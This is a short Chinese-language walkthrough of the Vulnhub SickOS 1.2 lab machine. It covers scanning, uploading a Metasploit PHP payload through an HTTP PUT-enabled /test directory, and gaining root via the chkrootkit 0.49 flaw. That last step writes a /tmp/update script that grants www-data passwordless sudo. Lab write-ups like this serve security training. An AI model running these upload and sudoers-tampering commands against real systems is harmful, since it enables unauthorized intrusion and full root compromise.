2021年1月19日-NO:14-Vulnhub-SickOS:1.2渗透学习
一、简介
靶机地址:https://www.vulnhub.com/entry/sickos-12,144/
kali地址:192.168.56.105
靶机IP地址:192.168.56.107
主要工具:curl,Metasploit
二、信息收集
靶机开放着,22和80端口
访问 web页面
只有一张图片,有点像何润东呢
进行目录爆破
发现test目录,访问试试
然而啥也没有
继续使用nikto扫描
再使用curl检查目录test上能用的HTTP方法
curl -v -X OPTIONS http://192.168.56.107/test/
可以上传文件
三、提权
使用msf制作biu.php ,作用你懂的
利用curl上传
curl --upload-file biu.php -v --url http://192.168.56.107/test/biu.php -0 --http1.0
上传成功
使用Metasploit连接
在web页面点击biu.php, msf将获得shell
找到了chkrootkit 0.49 ,向量提权
查看版本,注意 -V是大写
使用谷歌大法 搜索
可以用33899.c进行提权
需文件需要位于/ tmp / update
原理:chkrootkit
有crontab,会定期以root身份执行/tmp/update
文件。可以利用这一点,在/tmp目录下新建update文件,让root帮我们做事情。
echo 'chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL" >> /etc/sudoers' > /tmp/update
使用 sudo su - 提权
成功获得root权限
获得 flag
之前设置了其他端口怎样都获取不到shell,原来防火墙设置了规则,只允许80,8080,22,443进出
四、总结
只能使用443端口 是没有想到的
root权限运行
chmod +w /etc/sudoers && echo "www-data ALL=(ALL)NOPASSWD:ALL
可以通过 sudo su - 不用输入密码获得root